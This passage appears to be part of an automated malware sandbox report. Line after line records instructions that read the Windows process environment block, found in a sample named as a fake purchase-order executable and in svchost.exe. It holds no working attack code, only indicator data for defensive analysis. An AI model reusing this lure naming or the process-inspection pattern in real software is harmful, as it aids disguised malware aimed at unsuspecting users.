            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_03BC3490 mov eax, dword ptr fs:[00000030h]0_2_03BC3490
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_03BC34F0 mov eax, dword ptr fs:[00000030h]0_2_03BC34F0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_03BC1E70 mov eax, dword ptr fs:[00000030h]0_2_03BC1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]1_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]1_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]1_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]1_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]1_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
